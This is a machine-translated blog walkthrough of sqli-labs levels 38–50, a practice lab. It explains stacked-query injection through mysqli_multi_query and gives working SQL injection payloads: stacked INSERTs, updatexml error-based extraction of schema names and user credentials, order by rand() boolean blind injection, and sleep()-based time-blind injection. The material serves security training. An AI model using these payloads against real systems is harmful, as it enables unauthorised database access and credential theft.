当前位置：网站首页>Sqli labs customs clearance summary-page3

Sqli labs customs clearance summary-page3

2022-07-02 06:50:00 【Xu Jirong】

less-38

title ：GET - Stacked Query Injection - String

The code has been changed , It's not the way it used to be

if (mysqli_multi_query($con1, $sql))
{
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
    
        if($row = mysqli_fetch_row($result))
        {
    
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
// mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
    
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}

mysqli_multi_query()

See PHP mysqli_multi_query() function

Definition and Usage ：

mysqli_multi_query() Function to execute one or more queries against the database . Multiple queries are separated by semicolons . comparison mysqli_query() ,mysqli_multi_query() You can execute multiple query statements

grammar ：

mysqli_multi_query(connection,query);

Parameters	describe
connection	It's necessary . Stipulate what to use MySQL Connect .
query	It's necessary . Specify one or more queries , Separated by semicolons .

mysqli_store_result()

Definition and Usage ：

mysqli_store_result Transfer the result set returned by the last query , The result set after migration can stay mysqli_data_seek() Use in a function

grammar ：

mysqli_store_result ( mysqli $link [, int $option ] )

Parameters	describe
link	It's necessary . from mysqli_connect() or mysqli_init() Returned link ID

mysqli_fetch_row()

Definition and Usage ：

mysqli_fetch_row() Function takes a line from the result set , And return... As an enumerated array .

grammar ：

mysqli_fetch_row(result);

Parameters	describe
result	It's necessary . Provided by mysqli_query()、mysqli_store_result() or mysqli_use_result() Result set identifier returned .

mysqli_more_results()

Definition and Usage ：

mysqli_more_results() Function to check whether a multi query has more results .

grammar ：

mysqli_more_results(connection);

The key point of this question lies in this mysqli_multi_query() function , This function can execute multiple SQL sentence , So that we can Stack Injection , Enter multiple query statements （ With ; For the space sign ）

So how to measure Stack Injection ？ Add a ; Don't complain , It should be stackable injection

payload：

1';insert into users(id,username,password) values ('20','123','123')-- -

Insert picture description here
less-39

title ：GET - Stacked Query Injection - Intiger based

Follow 38 It's the same , It is digital Stack Injection

payload：

1;insert into users(id,username,password) values ('21','123','123')-- -

Insert picture description here
less-40

title ：GET - BLIND based - String - Stacked

index.php Next is based on ') Stack injection , Or joint query

In addition to this index.php There are other documents
Insert picture description here
Nothing was found

less-41

title ：GET - BLIND based - Intiger - Stacked

Digital Joint query or stack injection , Follow 38、39、40 Close similar

less-42

title ：POST - Error based - String - Stacked

index.php Submit form information to login.php
Insert picture description here

Look at the source code ,
First of all, there is no coding character setting for the database , Wide byte injection is not allowed , however , Here for the front-end submission login_password, No escape , And the query function is Multiple query statements Of mysqli_multi_query(), It indicates that stack injection can be performed here , You can stack any statement , There will be no demonstration here

If the information is correct, it will jump to logged-in.php
Insert picture description here

You can change the password , Fill in the information and submit the form to pass_change.php,
Insert picture description here
Look at the source code. The information here has also been escaped ,$_SESSION["username"] It is also the information queried by the database , We can't operate

Insert picture description here
The document in the red box has something , Other documents do not

less-43

title ：POST - Error based String - Stacked with twist

Follow 42 Close the same stack injection , It's just that the closure becomes ('')
Insert picture description here
less-44

Like the forty-two passes
Insert picture description here
The difference is 42 There is an error front-end echo ,44 Closed , But it doesn't affect

less-45

title ：POST - Error based - String Stacked - Blind

45 Guan heel 43 It's the same , Just went to the front end to report an error

less-46

title ：GET - Error based - Numeric - ORDER BY CLAUSE

The variable value of this level is changed to sort 了 , We type in ?sort=1 try
Insert picture description here
?sort=2

I guess the title is order by Sort query based on field value of type

At this time, we can nest an error echo function to obtain information
because The error reporting function displays a limited number of characters , The longest is 32 position , We can do it two ways
1.limit Line by line output
2.substr Intercepting string ( When intercepting, grasp 32 Within position )

This time we use substr Intercept the string to get information

 Get all databases 
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30)),0)
// XPATH syntax error: '~information_schema,challenges,'	
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),30,30)),0)
//XPATH syntax error: '~mysql,omg,performance_schema,s'
....
 Get all tables of a certain data 
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,30)),0)
// XPATH syntax error: '~emails,referers,uagents,users'	
 Get all field names of a table 
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,30)),0)
//XPATH syntax error: '~id,username,password'
 Get field value 
?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(username,'~',password) from users),1,30)),0)
//XPATH syntax error: '~Dumb~Dumb,Angelina~I-kill-you,'

Look at the source code
Insert picture description here

less-47

title ：GET Error based - String - ORDER BY CLAUSE

And 46 It's the same , Just the closing becomes a single quotation mark

$sql = "SELECT * FROM users ORDER BY '$id'";

But what we should pay attention to is order by Followed by Numbers or Field name , Single quotation marks can only be closed with the field name ,
If you fill in other characters , Sort by the first column by default

We directly check the field value

 Get field value 
?sort=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,'~',password) from users),1,30)),0) and '1
//XPATH syntax error: '~Dumb~Dumb,Angelina~I-kill-you,'

less-48

title ：GET - Error based - Blind - Numeric - ORDER BY CLAUSE

Input ?sort=1 and ?sort=2 The echo is found to be variable , Input ?sort=1' and ?sort=1" No echo , The description is digital

Check the database

?sort=1 and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,30)),0)

No echo found , It should be the wrong report

At this time, we can only use Boolean blind note , The point we should consider is how to find Boolean blind note 0 and 1

It's used at this time rand() Function , Matching order by The effect is as follows

order by rand(false)
Insert picture description here
order by rand(true)

Insert picture description here
We talked about that before rand() It's a pseudo-random function , Sorting is fixed , coordination order by Can produce 0 and 1 The effect of differentiation , In this way, we can cooperate

 Database search 
?sort=rand(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=105)

Insert picture description here
What if it's wrong

?sort=rand(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=0)

Insert picture description here
We can use this method to measure slowly , Or directly sqlmap run

less-49

title ：GET - Error based - String - Blind - ORDER BY CLAUSE

The closing mode of this switch is ', You can't use order by rand() 了 , Use time blind

The principle is

?sort=1' and if(1=1,sleep(0.05),null) and '0

complete SQL sentence

SELECT * FROM users ORDER by '1' and if(1=1,sleep(0.1),null) and '0'

Insert picture description here

It is worth noting that ,
When order by The following values will be executed only when they are correct if sentence
Before blind injection, you can Navicat Try it in and then write the script
And that is order by The traversal mechanism of is Traverse all lines , So every line ,sleep() I'll do it once , So this sleep() We can adjust the value of by feeling , Don't be too big , Here we use sleep(0.1)

We can write the sentence of searching the database like this

1' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),1,1))=105,sleep(0.1),null) and '1

Insert picture description here

altogether 12 That's ok , a line 0.1 second , Always implemented 1.4 A second more , almost , The principle of guessing tables and fields later is the same , No more

less-50

title ：GET - Error based - ORDER BY CLAUSE - numeric - Stacked injection

In addition to using mysqli_multi_query(), Everything else is the same
Insert picture description here
Here we just show you how to look at stacking
46 Turn off ?sort=1;select 1,2,3

Report errors